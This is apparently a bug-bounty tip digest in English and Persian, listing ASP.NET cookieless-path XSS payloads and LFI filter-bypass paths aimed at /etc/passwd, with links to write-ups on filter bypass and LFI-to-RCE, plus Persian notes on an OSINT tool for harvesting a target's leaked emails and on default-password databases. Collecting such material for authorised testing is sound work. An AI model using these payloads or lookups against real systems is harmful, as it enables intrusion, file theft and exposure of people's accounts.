XSS payloads for http://ASP.NET endpoints:

/(A('onerror=%22alert%601%60%22testabcd))/

/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders

(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f

For more ➡️ http://blog.isec.pl/all-is-xss-that-comes-to-the-net/

​​Awesome-Bugbounty-Writeups



https://github.com/devanshbatham/Awesome-Bugbounty-Writeups

Some filter bypass payload list while hunting for LFi vulnerability


→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd

→index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

$10,000 From GitHub For Bypassing Filtration oF HTML tags



https://infosecwriteups.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37

Converting LFI into RCE by chaining PHP encoding filters



https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html

سرویس SocialPwned به شما امکان می‌دهد ایمیل‌هایی را از هدف دریافت کنید که در شبکه‌های اجتماعی مانند اینستاگرام، لینکدین و توییتر منتشر شده‌اند تا نشت‌های احتمالی را در PwnDB یا Dehashed پیدا کنید و اطلاعات حساب Google را از طریق GHunt به دست آورید.

گزارش 2022 جغرافیای ارزهای دیجیتال توسط Chainalysis

هر آنچه که باید در مورد پذیرش کریپتو در جهان بدانید

رمز عبور پیش فرض

پایگاه داده های رمزهای عبور نصب شده به طور پیش فرض در دستگاه های مختلف را جستجو کنید.

https://cirt.net/passwords

https://www.fortypoundhead.com/tools_dpw.asp

https://www.routerpasswords.com/

https://open-sez.me/

@LeakedInfoBot
بهترین ربات OSINT است!